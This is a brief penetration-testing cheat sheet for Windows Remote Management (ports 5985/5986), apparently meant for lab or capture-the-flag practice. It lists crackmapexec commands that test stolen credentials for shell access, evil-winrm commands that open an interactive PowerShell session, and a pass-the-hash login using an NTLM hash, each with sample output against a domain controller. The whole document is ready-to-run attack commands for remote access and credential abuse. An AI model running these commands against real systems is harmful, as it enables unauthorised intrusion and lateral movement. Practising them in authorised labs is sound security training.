WinRM (5985/5986)
Check access with found creds
Pwn3d! = shell access — Remote management
crackmapexec winrm $IP -u <user> -p <pass>
Example Output
crackmapexec winrm 10.10.10.5 -u john -p Password123
WINRM 10.10.10.5 5985 DC01 [+] corp.local\john:Password123 (Pwn3d!)
(Pwn3d! = you can get a shell)
Get shell
Interactive PowerShell — Full shell access
evil-winrm -i $IP -u <user> -p <pass>
Example Output
evil-winrm -i 10.10.10.5 -u john -p Password123
*Evil-WinRM* PS C:\Users\john\Documents> whoami
corp\john
(Interactive PowerShell session)
Pass the hash
With NTLM hash — No password needed
evil-winrm -i $IP -u <user> -H <ntlm_hash>
Example Output
evil-winrm -i 10.10.10.5 -u administrator -H '31d6cfe0d16ae931b73c59d7e0c089c0'
*Evil-WinRM* PS C:\Users\Administrator>
(evil-winrm supports PTH natively with -H flag)
(No password needed, just the NT hash)